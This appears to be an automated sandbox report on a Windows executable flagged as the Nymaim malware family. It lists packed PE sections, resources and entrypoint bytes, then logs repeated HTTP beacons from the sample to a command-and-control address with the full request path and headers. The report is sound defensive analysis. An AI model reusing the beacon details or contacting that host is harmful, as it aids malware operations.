        TLSH:2595332BCF9AFA68DCA5037C3A351A09F459F0DF5A6BD0E3B9888B77844835745382D4
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

        File Icon

        Icon Hash:cfa99b8a8651798d

        Static PE Info

        General

        Entrypoint:0x8bd000
        Entrypoint Section:.taggant
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:TERMINAL_SERVER_AWARE
        Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:0
        File Version Major:5
        File Version Minor:0
        Subsystem Version Major:5
        Subsystem Version Minor:0
        Import Hash:2eabe9054cad5152567f0699947a2c5b

        Entrypoint Preview

        Instruction
        jmp 00007FC7C4E21E8Ah
        popcnt ebx, dword ptr [esi]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add cl, ch
        add byte ptr [eax], ah
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al

        Rich Headers

        Programming Language:
        • [C++] VS2008 build 21022
        • [ASM] VS2008 build 21022
        • [ C ] VS2008 build 21022
        • [IMP] VS2005 build 50727
        • [RES] VS2008 build 21022
        • [LNK] VS2008 build 21022

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x4b80940x18wzuxietl
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        0x10000x650000x3ae00d2ce44b7483c550a52efd93f40800debFalse0.9945179803609342data7.937026675516225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x660000x82340x3c00a1b001abd42dda0a2a637e41e7ef79a7False0.9260416666666667data7.709449479083595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        0x700000x2a00000x2005ee8d067dc27469c7ca7fb83316c5f4bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        wzuxietl0x3100000x1ac0000x1ab6006d1426ffbba6a3a054d391846f8b74edFalse0.9924856957443697data7.951751188887942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        wlxeuxhi0x4bc0000x10000x4002a589ce1fa839d931e7e5be6620822f0False0.7392578125data6.000780525873557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .taggant0x4bd0000x30000x22004f34644eb3e48cc86cbf6dba95771669False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

        Resources

        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_CURSOR0x664600xea8data1.0029317697228144
        RT_CURSOR0x673080x8a8data1.0049638989169676
        RT_CURSOR0x67bb00x568data1.0079479768786128
        RT_CURSOR0x681180xea8data1.0029317697228144
        RT_CURSOR0x68fc00x8a8data1.0049638989169676
        RT_CURSOR0x698680x568data0.5195652173913043
        RT_ICON0x4b80f40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
        RT_ICON0x4b80f40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
        RT_ICON0x4b87bc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
        RT_ICON0x4b87bc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
        RT_ICON0x4bad640x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
        RT_ICON0x4bad640x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
        RT_STRING0x6cea80x252emptyTamilIndia0
        RT_STRING0x6cea80x252emptyTamilSri Lanka0
        RT_STRING0x6d0fc0x396emptyTamilIndia0
        RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
        RT_STRING0x6d4940x520emptyTamilIndia0
        RT_STRING0x6d4940x520emptyTamilSri Lanka0
        RT_STRING0x6d9b40x3eeemptyTamilIndia0
        RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
        RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
        RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
        RT_GROUP_CURSOR0x6ddfc0x30empty0
        RT_GROUP_CURSOR0x6de2c0x30empty0
        RT_GROUP_ICON0x4bb1cc0x30dataTamilIndia0.9375
        RT_GROUP_ICON0x4bb1cc0x30dataTamilSri Lanka0.9375
        RT_VERSION0x4bb1fc0x254data0.5436241610738255
        RT_MANIFEST0x4bb4500x152ASCII text, with CRLF line terminators0.6479289940828402

        Imports

        DLLImport
        kernel32.dlllstrcpy

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        TamilIndia
        TamilSri Lanka

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Nov 30, 2024 14:04:57.036019087 CET4973080192.168.2.4185.156.72.65
        Nov 30, 2024 14:04:57.156284094 CET8049730185.156.72.65192.168.2.4
        Nov 30, 2024 14:04:57.156481981 CET4973080192.168.2.4185.156.72.65
        Nov 30, 2024 14:04:57.156701088 CET4973080192.168.2.4185.156.72.65
        Nov 30, 2024 14:04:57.276963949 CET8049730185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:19.090085983 CET8049730185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:19.090166092 CET4973080192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:19.090362072 CET4973080192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:19.211034060 CET8049730185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:22.105595112 CET4973780192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:22.225625992 CET8049737185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:22.227440119 CET4973780192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:22.227597952 CET4973780192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:22.347542048 CET8049737185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:44.200150967 CET8049737185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:44.200354099 CET4973780192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:44.200445890 CET4973780192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:44.320314884 CET8049737185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:47.226084948 CET4973880192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:47.346230984 CET8049738185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:47.346304893 CET4973880192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:47.347841024 CET4973880192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:47.467987061 CET8049738185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:55.356061935 CET4973880192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:58.375174999 CET4974680192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:58.495418072 CET8049746185.156.72.65192.168.2.4
        Nov 30, 2024 14:05:58.495507956 CET4974680192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:58.495744944 CET4974680192.168.2.4185.156.72.65
        Nov 30, 2024 14:05:58.615767002 CET8049746185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:20.466723919 CET8049746185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:20.468476057 CET4974680192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:20.468476057 CET4974680192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:20.588460922 CET8049746185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:23.483700037 CET4980280192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:23.603631973 CET8049802185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:23.603766918 CET4980280192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:23.603975058 CET4980280192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:23.723953009 CET8049802185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:45.536488056 CET8049802185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:45.536540985 CET4980280192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:45.536761045 CET4980280192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:45.658185005 CET8049802185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:48.546688080 CET4985680192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:48.668020010 CET8049856185.156.72.65192.168.2.4
        Nov 30, 2024 14:06:48.668107986 CET4985680192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:48.669321060 CET4985680192.168.2.4185.156.72.65
        Nov 30, 2024 14:06:48.789181948 CET8049856185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:10.639632940 CET8049856185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:10.646532059 CET4985680192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:10.654530048 CET4985680192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:10.774909019 CET8049856185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:13.672585964 CET4991280192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:13.792679071 CET8049912185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:13.792776108 CET4991280192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:13.793101072 CET4991280192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:13.912955999 CET8049912185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:35.709151030 CET8049912185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:35.709223986 CET4991280192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:35.710235119 CET4991280192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:35.830065966 CET8049912185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:38.718030930 CET4996880192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:38.837920904 CET8049968185.156.72.65192.168.2.4
        Nov 30, 2024 14:07:38.838102102 CET4996880192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:38.838320971 CET4996880192.168.2.4185.156.72.65
        Nov 30, 2024 14:07:38.958172083 CET8049968185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:00.790765047 CET8049968185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:00.790859938 CET4996880192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:00.791337967 CET4996880192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:00.911366940 CET8049968185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:03.902940989 CET5001180192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:04.023180962 CET8050011185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:04.023256063 CET5001180192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:04.023833990 CET5001180192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:04.143738985 CET8050011185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:25.969661951 CET8050011185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:25.969718933 CET5001180192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:25.969918013 CET5001180192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:26.089957952 CET8050011185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:28.985451937 CET5001280192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:29.105421066 CET8050012185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:29.105504990 CET5001280192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:29.105788946 CET5001280192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:29.225641012 CET8050012185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:47.029756069 CET5001280192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:50.048405886 CET5001380192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:50.168550014 CET8050013185.156.72.65192.168.2.4
        Nov 30, 2024 14:08:50.168718100 CET5001380192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:50.168823004 CET5001380192.168.2.4185.156.72.65
        Nov 30, 2024 14:08:50.288666964 CET8050013185.156.72.65192.168.2.4
        Nov 30, 2024 14:09:12.086620092 CET8050013185.156.72.65192.168.2.4
        Nov 30, 2024 14:09:12.086751938 CET5001380192.168.2.4185.156.72.65

        HTTP Request Dependency Graph

        • 185.156.72.65

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449730185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:04:57.156701088 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.449737185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:05:22.227597952 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.449738185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:05:47.347841024 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.449746185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:05:58.495744944 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.449802185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:06:23.603975058 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.449856185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:06:48.669321060 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.449912185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:07:13.793101072 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.449968185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:07:38.838320971 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.2.450011185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:08:04.023833990 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.2.450012185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:08:29.105788946 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.2.450013185.156.72.65807524C:\Users\user\Desktop\file.exe
        TimestampBytes transferredDirectionData
        Nov 30, 2024 14:08:50.168823004 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Target ID:0
        Start time:08:04:53
        Start date:30/11/2024
        Path:C:\Users\user\Desktop\file.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\file.exe"
        Imagebase:0x400000
        File size:2'021'888 bytes
        MD5 hash:7B58F626A6ACDCA919AAAE907585B8C0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
        Reputation:low
        Has exited:false

        Disassembly

        No disassembly